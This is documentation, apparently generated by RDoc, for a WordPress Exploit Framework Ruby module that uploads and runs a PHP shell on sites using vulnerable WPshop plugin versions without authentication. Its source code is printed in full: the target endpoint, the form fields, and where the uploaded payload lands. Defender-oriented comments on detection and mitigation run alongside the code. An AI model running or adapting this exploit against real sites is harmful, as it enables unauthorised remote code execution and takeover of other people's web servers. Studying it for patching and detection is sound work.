class Wpxf::Exploit::WpshopShellUpload
Public Class Methods
new()
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 6
#
# Sets up the module and registers its descriptive metadata.
#
# The parent initializer runs first, then the module's name, description,
# credits, advisory references and disclosure date are handed to
# +update_info+. The description states the affected range as WPshop
# 1.3.3.3 to 1.3.9.5 and that no authentication is required, so sites on
# any release in that range should be treated as exposed until upgraded.
def initialize
  super

  summary = 'This module exploits a file upload vulnerability in versions '\
            '1.3.3.3 to 1.3.9.5 of the WPshop plugin which '\
            'allows unauthenticated users to upload and execute PHP scripts '\
            'in the context of the web server.'

  credits = [
    'g0blin',   # Vulnerability discovery
    'rastating' # WPXF module
  ]

  # Advisory identifiers for cross-referencing with vulnerability feeds.
  advisories = [
    ['WPVDB', '7830'],
    ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']
  ]

  update_info(
    name: 'WPshop Shell Upload',
    desc: summary,
    author: credits,
    references: advisories,
    date: 'Mar 09 2015'
  )
end
Public Instance Methods
check()
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 27
#
# Reports whether the target appears to run an affected WPshop release.
#
# The decision is delegated to +check_plugin_version_from_readme+, so the
# result is a version inference drawn from the plugin's readme rather than
# proof that the upload handler is reachable. A missing or edited readme
# may therefore give a misleading answer; verify against the installed
# plugin files when auditing.
#
# @return whatever +check_plugin_version_from_readme+ returns
def check
  plugin_slug = 'wpshop'

  # Argument roles are inferred from the module description (affected
  # versions 1.3.3.3 to 1.3.9.5); the helper's signature is not visible
  # here -- confirm against its definition.
  fixed_in = '1.3.9.6'
  introduced_in = '1.3.3.3'

  check_plugin_version_from_readme(plugin_slug, fixed_in, introduced_in)
end
payload_body_builder()
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 31
#
# Assembles the request body sent to the plugin's upload handler.
#
# The body carries exactly two parts: an +elementCode+ field set to
# +ajaxUpload+, and a +wpshop_file+ file part holding the encoded payload
# under +payload_name+. Nothing added here carries a session cookie, nonce
# or other credential, which matches the description's statement that the
# flaw is reachable without authentication. For defenders, requests to the
# plugin's ajax handler that combine these two field names are a
# recognisable pattern to alert on.
#
# @return [Utility::BodyBuilder] the populated builder
def payload_body_builder
  Utility::BodyBuilder.new.tap do |form|
    form.add_field('elementCode', 'ajaxUpload')
    form.add_file_from_string('wpshop_file', payload.encoded, payload_name)
  end
end
uploaded_payload_location()
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 42
#
# Builds the URL at which the uploaded file is expected to be served.
#
# The path is <wp-content>/uploads/<payload_name>, i.e. directly in the
# uploads directory under the name the module supplied. This suggests the
# affected handler stores the file without renaming it or restricting its
# type -- inferred from this path only, confirm against the advisory.
# Denying script execution in the uploads directory limits the impact of
# this class of flaw, and unexpected script files there are a useful
# indicator when triaging a site that ran an affected version.
#
# @return the value produced by +normalize_uri+
def uploaded_payload_location
  content_root = wordpress_url_wp_content
  normalize_uri(content_root, 'uploads', payload_name)
end
uploader_url()
# File lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb, line 38
#
# Builds the URL of the plugin endpoint that receives the upload.
#
# The endpoint is includes/ajax.php inside the wpshop plugin directory,
# addressed directly rather than through WordPress's own admin-ajax
# routing. Access logs showing requests to this path from clients without
# a session are a practical detection point on sites still running an
# affected release; upgrading the plugin is the fix.
#
# @return the value produced by +normalize_uri+
def uploader_url
  endpoint_segments = %w[wpshop includes ajax.php]
  normalize_uri(wordpress_url_plugins, *endpoint_segments)
end